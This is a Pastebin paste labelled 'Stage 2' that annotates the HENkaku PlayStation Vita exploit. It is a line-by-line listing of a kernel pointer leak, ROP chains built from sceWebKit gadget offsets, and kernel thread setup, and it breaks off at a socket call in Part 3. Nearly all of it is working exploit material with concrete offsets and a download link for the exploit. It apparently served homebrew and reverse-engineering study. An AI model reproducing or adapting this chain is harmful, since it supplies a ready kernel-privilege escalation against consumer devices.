API tools faq
paste
Advertisement
Guest User

Stage 2

a guest
Aug 6th, 2016
5,766
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.99 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. HENkaku Exploit - https://www.sendspace.com/file/3k3qgw
  3.  
  4. */
  5.  
  6. /*
  7. PART 1 - Kernel Pointers Leak
  8. */
  9. 0x00000000-0x00000018: strcpy(exploit+0x86B4,"sdstor0:");
  10. 0x0000001C-0X0000003C: strcpy(exploit+0x86CC,"xmc-lp-ign-userext");
  11. 0x00000040-0X00000064: memset(exploit+0x6F34,0,0x400);
  12. 0x00000068-0x00000084: strcpy(exploit+0x86E4,"molecule0:");
  13. 0x00000088-0x000000AC: sceLibKernel_export_sub0x0000A4AD("molecule0:");//R0-lost
  14. 0x000000B0-0x000000DC: sceLibKernel_export_sub0x0000A55D("sdstor0:",5,"xmc-lp-ign-userext",0x14,exploit + 0x00006F34,0x000003FF);//sceIoDevctl?
  15. 0x000000E0-0x00000114: [exploit + 0x00008464] = [exploit + 0x00007308] - 22343 //LEAKED POINTER 1 --> KernelModule1 Base
  16. 0x00000118-0x0000015c: pln_threadUID{exploit + 0x00008E94} = sceKernelCreateThread("pln", ThreadProc[LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}], /*PRIORITY*/0x10000100,0x2000/stackSize/,0,0,0);
  17. 0x00000160-0x0000017c: [exploit + 0x0000862C] = 0x7C // sizeof(SceKernelThreadInfo);
  18. 0x00000180-0x0000019c: int sceKernelGetThreadInfo([pln_threadUID{exploit + 0x00008E94}],exploit + 0x0000862C);
  19.  
  20. 0x000001A0-0x000001D4: [exploit + 0x00008EA0] = [exploit + 0x00008660 AKA pln_threadInfo + 0x34 AKA SceKernelThreadInfo.stack(void*)] + 0x00001000
  21. /* //// create pln thread proc ROP-chain //// */
  22. // syscall extra params
  23. 0x000001D8-0x000001F4: [exploit + 0x00008954] = 0x14
  24. 0x000001F8-0x00000214: [exploit + 0x00008958] = exploit + 0x00006F34
  25. 0x00000218-0x00000234: [exploit + 0x0000895C] = 0x000003FF
  26. // syscall extra params:
  27. 0x00000238-0x00000254: [exploit + 0x0000896C] = 0x00000400
  28. 0x00000258-0x00000274: [exploit + 0x00008970] = 0
  29. 0x00000278-0x00000294: [exploit + 0x00008974] = 0
  30.  
  31. 0x00000298-0x000002B8: [exploit + 0x00008708] = sceWebKit + 0x008DD9B5 <br>POP {R0-R5,PC}
  32. 0x000002BC-0x000002D4: [exploit + 0x0000870C] = exploit + 0x000086E4 copy of "molecule0:"
  33. 0x000002D8-0x000002F4: [exploit + 0x00008710] = 0
  34. 0x000002F8-0x00000314: [exploit + 0x00008714] = 0
  35. 0x00000318-0x00000334: [exploit + 0x00008718] = 0
  36. 0x00000338-0x00000354: [exploit + 0x0000871C] = sceLibKernel_export_sub0x0000A4AD
  37. 0x00000358-0x00000374: [exploit + 0x00008720] = 0
  38. 0x00000378-0x00000394: [exploit + 0x00008724] = sceWebKit + 0x000FCDBB <br>BLX R4<br>POP {R4,PC}
  39. 0x00000398-0x000003B4: [exploit + 0x00008728] = 0
  40. 0x000003B8-0x000003D4: [exploit + 0x0000872C] = sceWebKit + 0x008DD9B5 <br>POP {R0-R5,PC}
  41. 0x000003D8-0x000003F4: [exploit + 0x00008730] = exploit + 0x000086B4 //copy of "sdstor0:"
  42. 0x000003F8-0x00000414: [exploit + 0x00008734] = 5
  43. 0x00000418-0x00000434: [exploit + 0x00008738] = exploit + 0x000086CC //copy of "xmc-lp-ign-userext"
  44. 0x00000438-0x00000454: [exploit + 0x0000873C] = exploit + 0x00008954//syscall extra params
  45. 0x00000458-0x00000474: [exploit + 0x00008740] = sceLibKernel_import_sub0x0000690C // (syscall) sceIoDevCtl?
  46. 0x00000478-0x00000494: [exploit + 0x00008744] = 0
  47. 0x00000498-0x000004B4: [exploit + 0x00008748] = sceWebKit + 0x000FCDBB <br>BLX R4<br>POP {R4,PC}
  48. 0x000004B8-0x000004D4: [exploit + 0x0000874C] = 0
  49. 0x000004D8-0x000004F4: [exploit + 0x00008750] = sceWebKit + 0x008DD9B5 <br>POP {R0-R5,PC}
  50. 0x000004F8-0x00000514: [exploit + 0x00008754] = 0x000F4240 (1000000)
  51. 0x00000518-0x00000534: [exploit + 0x00008758] = 0
  52. 0x00000538-0x00000554: [exploit + 0x0000875C] = 0
  53. 0x00000558-0x00000574: [exploit + 0x00008760] = 0
  54. 0x00000578-0x00000594: [exploit + 0x00008764] = sceKernelDelayThread(1000000 /* 1 sec */);
  55. 0x00000598-0x000005B4: [exploit + 0x00008768] = 0
  56. 0x000005B8-0x000005D4: [exploit + 0x0000876C] = sceWebKit + 0x000FCDBB <br>BLX R4<br>POP {R4,PC}
  57. 0x000005D8-0x000005F4: [exploit + 0x00008770] = 0
  58. //map memory by kernel?:
  59. 0x000005F8-0x00000614: [exploit + 0x00008774] = sceWebKit + 0x008DD9B5 <br>POP {R0-R5,PC}
  60. 0x00000618-0x00000634: [exploit + 0x00008778] = exploit + 0x000086B4 copy of "sdstor0:"
  61. 0x00000638-0x00000654: [exploit + 0x0000877C] = 5 //cmd
  62. 0x00000658-0x00000674: [exploit + 0x00008780] = exploit + 0x00007444 //parg
  63. 0x00000678-0x00000694: [exploit + 0x00008784] = exploit + 0x0000896C //syscall extra params
  64. 0x00000698-0x000006B4: [exploit + 0x00008788] = sceLibKernel_import_sub0x0000690C // (syscall) sceIoDevCtl
  65. 0x000006B8-0x000006D4: [exploit + 0x0000878C] = 0
  66. 0x000006D8-0x000006F4: [exploit + 0x00008790] = sceWebKit + 0x000FCDBB <br>BLX R4<br>POP {R4,PC}
  67. 0x000006F8-0x00000714: [exploit + 0x00008794] = 0
  68. 0x00000718-0x00000734: [exploit + 0x00008798] = sceWebKit + 0x00000519 INFINE LOOP
  69. /* //// end of pln thread proc ROP-chain //// */
  70. 0x00000738-0x0000075C: sceLibC_sub0x00013F01([exploit + 0x00008EA0],exploit + 0x00008708,0x100);//memcpy(pln stack, rop chain, 0x100)
  71. 0x00000760-0x0000077C: [exploit + 0x00008830] = [exploit + 0x00008EA0] <- new SP for thread
  72. 0x00000780-0x0000079C: [exploit + 0x00008834] = sceWebKit + 0x000C048B - POP {PC} <- new PC for thread
  73. 0x000007A0-0x000007C4: sceKernelStartThread([pln_threadUID{exploit + 0x00008E94}],0x1C/*arglen*/, exploit + 0x0000881C/*arg*/);
  74. 0x000007C8-0x000007DC: sceKernelDelayThread(0x000186A0/* 1000000 */);//sync
  75. 0x000007E0-0x00000814: [exploit + 0x00008458] = [exploit + 0x000072F8] + 0xFFFFF544 //LEAKED POINTER 2 -> KernelModule2 Base!!!!
  76. /*
  77. PART 2 - Create Kernel Mode Thread ROP
  78. */
  79. 0x00000818-0x0000084C: [exploit + 0x00007444] = [exploit + 0x00008464] + 0x0001E460
  80. 0x00000850-0x0000089C: [exploit + 0x00008EAC] = [exploit + 0x00008458] + 0x000006F8 + 0x00000300
  81.  
  82. 0x000008A0-0x000008D4: [exploit + 0x00008A8C] = [exploit + 0x00008464] + 0x31
  83. 0x000008D8-0x000008F4: [exploit + 0x00008A90] = 0x08106803
  84. 0x000008F8-0x0000092C: [exploit + 0x00008A94] = [exploit + 0x00008464] + 0x0001EFF1
  85. 0x00000930-0x0000094C: [exploit + 0x00008A98] = 0x38
  86. 0x00000950-0x00000984: [exploit + 0x00008A9C] = [exploit + 0x00008464] + 0x0001EFE1
  87. 0x00000988-0x000009BC: [exploit + 0x00008AA0] = [exploit + 0x00008464] + 0x00000347
  88. 0x000009C0-0x000009F4: [exploit + 0x00008AA4] = [exploit + 0x00008464] + 0x000039EB
  89. 0x000009F8-0x00000A2C: [exploit + 0x00008AA8] = [exploit + 0x00008464] + 0x0001B571
  90. 0x00000A30-0x00000A4C: [exploit + 0x00008AAC] = 0
  91. 0x00000A50-0x00000A84: [exploit + 0x00008AB0] = [exploit + 0x00008464] + 0x00001E43
  92. 0x00000A88-0x00000AA4: [exploit + 0x00008AB4] = 0
  93. 0x00000AA8-0x00000ADC: [exploit + 0x00008AB8] = [exploit + 0x00008464] + 0x0001FC6D
  94. 0x00000AE0-0x00000B14: [exploit + 0x00008ABC] = [exploit + 0x00008464] + 0x0000EA73
  95. 0x00000B18-0x00000B4C: [exploit + 0x00008AC0] = [exploit + 0x00008464] + 0x31
  96. 0x00000B50-0x00000B84: [exploit + 0x00008AC4] = [exploit + 0x00008464] + 0x00027913
  97. 0x00000B88-0x00000BBC: [exploit + 0x00008AC8] = [exploit + 0x00008464] + 0x0000A523
  98. 0x00000BC0-0x00000BF4: [exploit + 0x00008ACC] = [exploit + 0x00008464] + 0x00000347
  99. 0x00000BF8-0x00000C2C: [exploit + 0x00008AD0] = [exploit + 0x00008464] + 0x00000CE3
  100. 0x00000C30-0x00000C64: [exploit + 0x00008AD4] = [exploit + 0x00008464] + 0x00000347
  101. 0x00000C68-0x00000C9C: [exploit + 0x00008AD8] = [exploit + 0x00008464] + 0x0001F2B1
  102. 0x00000CA0-0x00000CD4: [exploit + 0x00008ADC] = [exploit + 0x00008464] + 0x67
  103. 0x00000CD8-0x00000D0C: [exploit + 0x00008AE0] = [exploit + 0x00008464] + 0x0000587F
  104. 0x00000D10-0x00000D44: [exploit + 0x00008AE4] = [exploit + 0x00008464] + 0x00019713
  105. 0x00000D48-0x00000D7C: [exploit + 0x00008AE8] = [exploit + 0x00008464] + 0x00001605
  106. 0x00000D80-0x00000DB4: [exploit + 0x00008AEC] = [exploit + 0x00008464] + 0x00001E1D
  107. 0x00000DB8-0x00000DD4: [exploit + 0x00008AF0] = 0
  108. 0x00000DD8-0x00000E0C: [exploit + 0x00008AF4] = [exploit + 0x00008464] + 0x0001EFE1
  109. 0x00000E10-0x00000E44: [exploit + 0x00008AF8] = [exploit + 0x00008464] + 0x347
  110. 0x00000E48-0x00000E7C: [exploit + 0x00008AFC] = [exploit + 0x00008464] + 0x00001603
  111. 0x00000E80-0x00000EB4: [exploit + 0x00008B00] = [exploit + 0x00008464] + 0x0001F2B1
  112. 0x00000EB8-0x00000EEC: [exploit + 0x00008B04] = [exploit + 0x00008464] + 0x00001F17
  113. 0x00000EF0-0x00000F24: [exploit + 0x00008B08] = [exploit + 0x00008464] + 0x00000347
  114. 0x00000F28-0x00000F5C: [exploit + 0x00008B0C] = [exploit + 0x00008464] + 0x31
  115. 0x00000F60-0x00000F94: [exploit + 0x00008B10] = [exploit + 0x00008464] + 0x0000B913
  116. 0x00000F98-0x00000FCC: [exploit + 0x00008B14] = [exploit + 0x00008464] + 0x00023B61
  117. 0x00000FD0-0x00001004: [exploit + 0x00008B18] = [exploit + 0x00008464] + 0x00000347
  118.  
  119. 0x00001008-0x0000103C: [exploit + 0x00008B1C] = [exploit + 0x00008464] + 0x000039EB
  120.  
  121. 0x00001040-0x00001074: [exploit + 0x00008B20] = [exploit + 0x00008464] + 0x000232EB
  122.  
  123. 0x00001078-0x000010AC: [exploit + 0x00008B24] = [exploit + 0x00008464] + 0x00000347
  124.  
  125. 0x000010B0-0x000010E4: [exploit + 0x00008B28] = [exploit + 0x00008464] + 0x0001B571
  126.  
  127. 0x000010E8-0x0000111C: [exploit + 0x00008B2C] = [exploit + 0x00008464] + 0x00023B61
  128.  
  129. 0x00001120-0x00001154: [exploit + 0x00008B30] = [exploit + 0x00008464] + 0x000232F1
  130.  
  131. 0x00001158-0x0000118C: [exploit + 0x00008B34] = [exploit + 0x00008464] + 0x00001411
  132.  
  133. 0x00001190-0x000011C4: [exploit + 0x00008B38] = [exploit + 0x00008464] + 0x00000AE1
  134.  
  135. 0x000011C8-0x000011FC: [exploit + 0x00008B3C] = [exploit + 0x00008464] + 0x00000347
  136.  
  137. 0x00001200-0x00001234: [exploit + 0x00008B40] = [exploit + 0x00008464] + 0x000050E9
  138.  
  139. 0x00001238-0x0000126C: [exploit + 0x00008B44] = [exploit + 0x00008464] + 0x00001411
  140. 0x00001270-0x0000128C: [exploit + 0x00008B48] = 0x00000010
  141. 0x00001290-0x000012C4: [exploit + 0x00008B4C] = [exploit + 0x00008464] + 0x0001F2B1
  142.  
  143. 0x000012C8-0x000012FC: [exploit + 0x00008B50] = [exploit + 0x00008464] + 0x00012B11
  144.  
  145. 0x00001300-0x00001334: [exploit + 0x00008B54] = [exploit + 0x00008464] + 0x00000CE3
  146.  
  147. 0x00001338-0x0000136C: [exploit + 0x00008B58] = [exploit + 0x00008464] + 0x000000D1
  148.  
  149. 0x00001370-0x000013A4: [exploit + 0x00008B5C] = [exploit + 0x00008464] + 0x00000347
  150.  
  151. 0x000013A8-0x000013DC: [exploit + 0x00008B60] = [exploit + 0x00008464] + 0x0001F2B1
  152.  
  153. 0x000013E0-0x00001414: [exploit + 0x00008B64] = [exploit + 0x00008464] + 0x00000347
  154.  
  155. 0x00001418-0x0000144C: [exploit + 0x00008B68] = [exploit + 0x00008464] + 0x000039EB
  156.  
  157. 0x00001450-0x00001484: [exploit + 0x00008B6C] = [exploit + 0x00008464] + 0x0001FDC5
  158.  
  159. 0x00001488-0x000014BC: [exploit + 0x00008B70] = [exploit + 0x00008464] + 0x0001D8DB
  160.  
  161. 0x000014C0-0x000014F4: [exploit + 0x00008B74] = [exploit + 0x00008464] + 0x00019399
  162.  
  163. 0x000014F8-0x0000152C: [exploit + 0x00008B78] = [exploit + 0x00008464] + 0x00019399
  164.  
  165. 0x00001530-0x00001564: [exploit + 0x00008B7C] = [exploit + 0x00008464] + 0x00011C5F
  166.  
  167. 0x00001568-0x0000159C: [exploit + 0x00008B80] = [exploit + 0x00008464] + 0x00019399
  168.  
  169. 0x000015A0-0x000015D4: [exploit + 0x00008B84] = [exploit + 0x00008464] + 0x00000347
  170.  
  171. 0x000015D8-0x0000160C: [exploit + 0x00008B88] = [exploit + 0x00008464] + 0x0000B913
  172. 0x00001610-0x0000162C: [exploit + 0x00008B8C] = 0x00000000
  173. 0x00001630-0x00001664: [exploit + 0x00008B90] = [exploit + 0x00008464] + 0x0001EFE1
  174.  
  175. 0x00001668-0x0000169C: [exploit + 0x00008B94] = [exploit + 0x00008464] + 0x00000347
  176.  
  177. 0x000016A0-0x000016D4: [exploit + 0x00008B98] = [exploit + 0x00008464] + 0x00001861
  178.  
  179. 0x000016D8-0x0000170C: [exploit + 0x00008B9C] = [exploit + 0x00008464] + 0x0001FC6D
  180.  
  181. 0x00001710-0x00001744: [exploit + 0x00008BA0] = [exploit + 0x00008464] + 0x0001F2B1
  182.  
  183. 0x00001748-0x0000177C: [exploit + 0x00008BA4] = [exploit + 0x00008464] + 0x00000347
  184.  
  185. 0x00001780-0x000017B4: [exploit + 0x00008BA8] = [exploit + 0x00008464] + 0x000039EB
  186.  
  187. 0x000017B8-0x000017EC: [exploit + 0x00008BAC] = [exploit + 0x00008464] + 0x00019399
  188.  
  189. 0x000017F0-0x00001824: [exploit + 0x00008BB0] = [exploit + 0x00008464] + 0x00000347
  190.  
  191. 0x00001828-0x0000185C: [exploit + 0x00008BB4] = [exploit + 0x00008464] + 0x00019399
  192.  
  193. 0x00001860-0x00001894: [exploit + 0x00008BB8] = [exploit + 0x00008464] + 0x00000347
  194.  
  195. 0x00001898-0x000018CC: [exploit + 0x00008BBC] = [exploit + 0x00008464] + 0x000039EB
  196.  
  197. 0x000018D0-0x00001904: [exploit + 0x00008BC0] = [exploit + 0x00008464] + 0x0001614D
  198.  
  199. 0x00001908-0x0000193C: [exploit + 0x00008BC4] = [exploit + 0x00008464] + 0x000233D3
  200.  
  201. 0x00001940-0x00001974: [exploit + 0x00008BC8] = [exploit + 0x00008464] + 0x0001F2B1
  202.  
  203. 0x00001978-0x000019AC: [exploit + 0x00008BCC] = [exploit + 0x00008464] + 0x00000347
  204.  
  205. 0x000019B0-0x000019E4: [exploit + 0x00008BD0] = [exploit + 0x00008464] + 0x000000AF
  206.  
  207. 0x000019E8-0x00001A1C: [exploit + 0x00008BD4] = [exploit + 0x00008464] + 0x00001605
  208.  
  209. 0x00001A20-0x00001A54: [exploit + 0x00008BD8] = [exploit + 0x00008464] + 0x0001EFE1
  210.  
  211. 0x00001A58-0x00001A8C: [exploit + 0x00008BDC] = [exploit + 0x00008464] + 0x00000347
  212.  
  213. 0x00001A90-0x00001AC4: [exploit + 0x00008BE0] = [exploit + 0x00008464] + 0x000050E9
  214.  
  215. 0x00001AC8-0x00001AFC: [exploit + 0x00008BE4] = [exploit + 0x00008464] + 0x000039EB
  216.  
  217. 0x00001B00-0x00001B34: [exploit + 0x00008BE8] = [exploit + 0x00008464] + 0x00001347
  218.  
  219. 0x00001B38-0x00001B6C: [exploit + 0x00008BEC] = [exploit + 0x00008464] + 0x00000347
  220.  
  221. 0x00001B70-0x00001BA4: [exploit + 0x00008BF0] = [exploit + 0x00008464] + 0x000000B9
  222.  
  223. 0x00001BA8-0x00001BDC: [exploit + 0x00008BF4] = [exploit + 0x00008464] + 0x0001F2B1
  224.  
  225. 0x00001BE0-0x00001C14: [exploit + 0x00008BF8] = [exploit + 0x00008464] + 0x00001347
  226.  
  227. 0x00001C18-0x00001C4C: [exploit + 0x00008BFC] = [exploit + 0x00008464] + 0x00000347
  228.  
  229. 0x00001C50-0x00001C84: [exploit + 0x00008C00] = [exploit + 0x00008464] + 0x0000039B
  230. 0x00001C88-0x00001CA4: [exploit + 0x00008C04] = 0x00000000
  231. 0x00001CA8-0x00001CDC: [exploit + 0x00008C08] = [exploit + 0x00008464] + 0x0001CB95
  232.  
  233. 0x00001CE0-0x00001D14: [exploit + 0x00008C0C] = [exploit + 0x00008464] + 0x0001EA93
  234.  
  235. 0x00001D18-0x00001D4C: [exploit + 0x00008C10] = [exploit + 0x00008464] + 0x00001411
  236.  
  237. 0x00001D50-0x00001D84: [exploit + 0x00008C14] = [exploit + 0x00008464] + 0x00000347
  238.  
  239. 0x00001D88-0x00001DBC: [exploit + 0x00008C18] = [exploit + 0x00008464] + 0x000209D7
  240.  
  241. 0x00001DC0-0x00001DF4: [exploit + 0x00008C1C] = [exploit + 0x00008464] + 0x000209D3
  242.  
  243. 0x00001DF8-0x00001E2C: [exploit + 0x00008C20] = [exploit + 0x00008464] + 0x00001411
  244.  
  245. 0x00001E30-0x00001E64: [exploit + 0x00008C24] = [exploit + 0x00008464] + 0x00000347
  246.  
  247. 0x00001E68-0x00001E9C: [exploit + 0x00008C28] = [exploit + 0x00008464] + 0x0001BAF5
  248.  
  249. 0x00001EA0-0x00001ED4: [exploit + 0x00008C2C] = [exploit + 0x00008464] + 0x00001605
  250.  
  251. 0x00001ED8-0x00001F0C: [exploit + 0x00008C30] = [exploit + 0x00008464] + 0x00000347
  252.  
  253. 0x00001F10-0x00001F44: [exploit + 0x00008C34] = [exploit + 0x00008464] + 0x0000652B
  254.  
  255. 0x00001F48-0x00001F7C: [exploit + 0x00008C38] = [exploit + 0x00008464] + 0x00000347
  256.  
  257. 0x00001F80-0x00001FB4: [exploit + 0x00008C3C] = [exploit + 0x00008464] + 0x0001BAF5
  258.  
  259. 0x00001FB8-0x00001FEC: [exploit + 0x00008C40] = [exploit + 0x00008464] + 0x00022A49
  260. 0x00001FF0-0x0000200C: [exploit + 0x00008C44] = 0xFFFFFEB0
  261. 0x00002010-0x00002044: [exploit + 0x00008C48] = [exploit + 0x00008464] + 0x0000039B
  262. 0x00002048-0x00002064: [exploit + 0x00008C4C] = 0x00000040
  263. 0x00002068-0x0000209C: [exploit + 0x00008C50] = [exploit + 0x00008464] + 0x00022A49
  264.  
  265. 0x000020A0-0x000020D4: [exploit + 0x00008C54] = [exploit + 0x00008464] + 0x00000347
  266.  
  267. 0x000020D8-0x0000210C: [exploit + 0x00008C58] = [exploit + 0x00008464] + 0x0000652B
  268.  
  269. 0x00002110-0x00002144: [exploit + 0x00008C5C] = [exploit + 0x00008464] + 0x00000347
  270.  
  271. 0x00002148-0x0000217C: [exploit + 0x00008C60] = [exploit + 0x00008464] + 0x0000039B
  272. 0x00002180-0x0000219C: [exploit + 0x00008C64] = 0x00000040
  273. 0x000021A0-0x000021D4: [exploit + 0x00008C68] = [exploit + 0x00008464] + 0x00001605
  274.  
  275. 0x000021D8-0x0000220C: [exploit + 0x00008C6C] = [exploit + 0x00008464] + 0x00000347
  276.  
  277. 0x00002210-0x00002244: [exploit + 0x00008C70] = [exploit + 0x00008464] + 0x0001D9EB
  278.  
  279. 0x00002248-0x0000227C: [exploit + 0x00008C74] = [exploit + 0x00008464] + 0x000039EB
  280.  
  281. 0x00002280-0x000022B4: [exploit + 0x00008C78] = [exploit + 0x00008464] + 0x00000853
  282.  
  283. 0x000022B8-0x000022EC: [exploit + 0x00008C7C] = [exploit + 0x00008464] + 0x0001D8DB
  284. 0x000022F0-0x0000230C: [exploit + 0x00008C80] = 0x00000038
  285. 0x00002310-0x00002344: [exploit + 0x00008C84] = [exploit + 0x00008464] + 0x000000AB
  286.  
  287. 0x00002348-0x0000237C: [exploit + 0x00008C88] = [exploit + 0x00008464] + 0x000000D1
  288.  
  289. 0x00002380-0x000023B4: [exploit + 0x00008C8C] = [exploit + 0x00008464] + 0x0002328B
  290.  
  291. 0x000023B8-0x000023EC: [exploit + 0x00008C90] = [exploit + 0x00008464] + 0x00022FCD
  292.  
  293. 0x000023F0-0x00002424: [exploit + 0x00008C94] = [exploit + 0x00008464] + 0x000000D1
  294.  
  295. 0x00002428-0x0000245C: [exploit + 0x00008C98] = [exploit + 0x00008464] + 0x0001EFF1
  296.  
  297. 0x00002460-0x00002494: [exploit + 0x00008C9C] = [exploit + 0x00008464] + 0x0002A117
  298.  
  299. 0x00002498-0x000024CC: [exploit + 0x00008CA0] = [exploit + 0x00008464] + 0x00000347
  300.  
  301. 0x000024D0-0x00002504: [exploit + 0x00008CA4] = [exploit + 0x00008464] + 0x00001605
  302.  
  303. 0x00002508-0x0000253C: [exploit + 0x00008CA8] = [exploit + 0x00008464] + 0x00019399
  304.  
  305. 0x00002540-0x00002574: [exploit + 0x00008CAC] = [exploit + 0x00008464] + 0x00000347
  306.  
  307. 0x00002578-0x000025AC: [exploit + 0x00008CB0] = [exploit + 0x00008464] + 0x000039EB
  308.  
  309. 0x000025B0-0x000025E4: [exploit + 0x00008CB4] = [exploit + 0x00008464] + 0x0001BF1F
  310. 0x000025E8-0x00002604: [exploit + 0x00008CB8] = 0xFFFFFEB0
  311. 0x00002608-0x0000263C: [exploit + 0x00008CBC] = [exploit + 0x00008464] + 0x0000039B
  312. 0x00002640-0x0000265C: [exploit + 0x00008CC0] = 0x00000040
  313. 0x00002660-0x00002694: [exploit + 0x00008CC4] = [exploit + 0x00008464] + 0x00022A49
  314.  
  315. 0x00002698-0x000026CC: [exploit + 0x00008CC8] = [exploit + 0x00008464] + 0x000039EB
  316.  
  317. 0x000026D0-0x00002704: [exploit + 0x00008CCC] = [exploit + 0x00008464] + 0x00003D73
  318. 0x00002708-0x00002724: [exploit + 0x00008CD0] = 0x00000000
  319. 0x00002728-0x0000275C: [exploit + 0x00008CD4] = [exploit + 0x00008464] + 0x000021FD
  320.  
  321. 0x00002760-0x00002794: [exploit + 0x00008CD8] = [exploit + 0x00008464] + 0x00000347
  322.  
  323. 0x00002798-0x000027CC: [exploit + 0x00008CDC] = [exploit + 0x00008464] + 0x000050E9
  324.  
  325. 0x000027D0-0x00002804: [exploit + 0x00008CE0] = [exploit + 0x00008464] + 0x00000AE1
  326.  
  327. 0x00002808-0x0000283C: [exploit + 0x00008CE4] = [exploit + 0x00008464] + 0x00000347
  328.  
  329. 0x00002840-0x00002874: [exploit + 0x00008CE8] = [exploit + 0x00008464] + 0x0002A117
  330.  
  331. 0x00002878-0x000028AC: [exploit + 0x00008CEC] = [exploit + 0x00008464] + 0x00000347
  332.  
  333. 0x000028B0-0x000028E4: [exploit + 0x00008CF0] = [exploit + 0x00008464] + 0x0001F2B1
  334.  
  335. 0x000028E8-0x0000291C: [exploit + 0x00008CF4] = [exploit + 0x00008464] + 0x00000067
  336.  
  337. 0x00002920-0x00002954: [exploit + 0x00008CF8] = [exploit + 0x00008464] + 0x000039EB
  338.  
  339. 0x00002958-0x0000298C: [exploit + 0x00008CFC] = [exploit + 0x00008464] + 0x0001BF47
  340.  
  341. 0x00002990-0x000029C4: [exploit + 0x00008D00] = [exploit + 0x00008464] + 0x00000347
  342.  
  343. 0x000029C8-0x000029FC: [exploit + 0x00008D04] = [exploit + 0x00008464] + 0x000050E9
  344.  
  345. 0x00002A00-0x00002A34: [exploit + 0x00008D08] = [exploit + 0x00008464] + 0x0000AF33
  346.  
  347. 0x00002A38-0x00002A6C: [exploit + 0x00008D0C] = [exploit + 0x00008464] + 0x00000347
  348.  
  349. 0x00002A70-0x00002AA4: [exploit + 0x00008D10] = [exploit + 0x00008464] + 0x0001D9EB
  350. 0x00002AA8-0x00002AC4: [exploit + 0x00008D14] = 0x00000000
  351. 0x00002AC8-0x00002AFC: [exploit + 0x00008D18] = [exploit + 0x00008464] + 0x0001FC6D
  352.  
  353. 0x00002B00-0x00002B34: [exploit + 0x00008D1C] = [exploit + 0x00008464] + 0x0000EA73
  354.  
  355. 0x00002B38-0x00002B6C: [exploit + 0x00008D20] = [exploit + 0x00008464] + 0x0000039B
  356.  
  357. 0x00002B70-0x00002BA4: [exploit + 0x00008D24] = [exploit + 0x00008464] + 0x00000853
  358. 0x00002BA8-0x00002BC4: [exploit + 0x00008D28] = 0xFFFFFFFF
  359. 0x00002BC8-0x00002BE4: [exploit + 0x00008D2C] = 0x08106803
  360. 0x00002BE8-0x00002C1C: [exploit + 0x00008D30] = [exploit + 0x00008464] + 0x000233D3
  361.  
  362. 0x00002C20-0x00002C54: [exploit + 0x00008D34] = [exploit + 0x00008464] + 0x00000347
  363.  
  364. 0x00002C58-0x00002C8C: [exploit + 0x00008D38] = [exploit + 0x00008464] + 0x00000433
  365.  
  366. 0x00002C90-0x00002CC4: [exploit + 0x00008D3C] = [exploit + 0x00008464] + 0x000233D3
  367.  
  368. 0x00002CC8-0x00002CFC: [exploit + 0x00008D40] = [exploit + 0x00008464] + 0x000150A3
  369.  
  370. 0x00002D00-0x00002D1C: [exploit + 0x00008D44] = 0x00000000
  371. 0x00002D20-0x00002D54: [exploit + 0x00008D48] = [exploit + 0x00008464] + 0x0000A74D
  372.  
  373. 0x00002D58-0x00002D8C: [exploit + 0x00008D4C] = [exploit + 0x00008464] + 0x00000000
  374.  
  375. 0x00002D90-0x00002DC4: [exploit + 0x00008D50] = [exploit + 0x00008464] + 0x00000853
  376.  
  377. 0x00002DC8-0x00002DFC: [exploit + 0x00008D54] = [exploit + 0x00008464] + 0x0001BF1F
  378.  
  379. 0x00002E00-0x00002E1C: [exploit + 0x00008D58] = 0x00000000
  380. 0x00002E20-0x00002E54: [exploit + 0x00008D5C] = [exploit + 0x00008464] + 0x00001605
  381.  
  382. 0x00002E58-0x00002E8C: [exploit + 0x00008D60] = [exploit + 0x00008464] + 0x00000347
  383.  
  384. 0x00002E90-0x00002EC4: [exploit + 0x00008D64] = [exploit + 0x00008464] + 0x000050E9
  385.  
  386. 0x00002EC8-0x00002EFC: [exploit + 0x00008D68] = [exploit + 0x00008464] + 0x00001605
  387.  
  388. 0x00002F00-0x00002F34: [exploit + 0x00008D6C] = [exploit + 0x00008464] + 0x00022FCD
  389.  
  390. 0x00002F38-0x00002F6C: [exploit + 0x00008D70] = [exploit + 0x00008464] + 0x000039EB
  391.  
  392. 0x00002F70-0x00002FA4: [exploit + 0x00008D74] = [exploit + 0x00008464] + 0x00000853
  393.  
  394. 0x00002FA8-0x00002FDC: [exploit + 0x00008D78] = [exploit + 0x00008464] + 0x00011C5F
  395. 0x00002FE0-0x00002FFC: [exploit + 0x00008C04] = [exploit + 0x00008EAC]
  396. 0x00003000-0x0000301C: [exploit + 0x00008B48] = 0x00000090
  397. 0x00003020-0x0000303C: [exploit + 0x00008CC0] = 0x00000240
  398. 0x00003040-0x0000305C: [exploit + 0x00008D58] = 0x00000200
  399. 0x00003060-0x0000307C: [exploit + 0x00008D14] = exploit + 0x00008FC0
  400. 0x00003080-0x000030A4: sceLibC_sub0x00013F01(exploit + 0x00007448, exploit + 0x00008A8C, 0x300);//copy Kernel Thread ROP to mapped memory?
  401. 0x000030A8-0x000030CC: sceLibC_sub0x00013F01(exploit + 0x00007744,exploit + 0x00008EB8, 0x400); //copy Kernel Thread Encrypted Data?
  402.  
  403. //Kernel Thread PC,SP:
  404. 0x000030D0-0x00003104: [exploit + 0x00008858] = [exploit + 0x00008458] + 0x000006DC
  405. 0x00003108-0x00003154: [exploit + 0x0000884C] = [exploit + 0x00008458] + 0x000006F8 + 0x00000004
  406. 0x00003158-0x0000318C: [exploit + 0x00008850] = [exploit + 0x00008464] + 0x00000347
  407.  
  408. 0x00003190-0x000031D4: [exploit + 0x00008620/*mhm_threadID*/] = sceKernelCreateThread(exploit + 0x0001037C "mhm",threadEntry{sceWebKit + 0x000054C8 <br>LDMIA R1,
  409.  
  410. {R1,R2,R4,R8,R11,SP,PC}},0x10000100,0x00002000,0,0,0);
  411. 0x000031D8-0x000031F4: [exploit + 0x0000862C/*mhm_threadInfo.size*/] = 0x0000007C
  412. 0x000031F8-0x00003214: sceKernelGetThreadInfo([exploit + 0x00008620/*mhm_threadID*/], exploit + 0x0000862C /*mhm_threadInfo*/);
  413. 0x00003218-0x0000324C: [exploit + 0x000086FC] = [exploit + 0x00008660/*mhm_threadInfo.stack*/] + 0x00001000
  414.  
  415. /*
  416. PART 3 - Create Kernel Mode Thread Object
  417. */
  418. 0x00003250-0x0000328C: [exploit + 0x00008470] = sceNetSocket(exploit + 0x00010388, 0x00000002, 0x00000001, 0x00000000)
  419.  
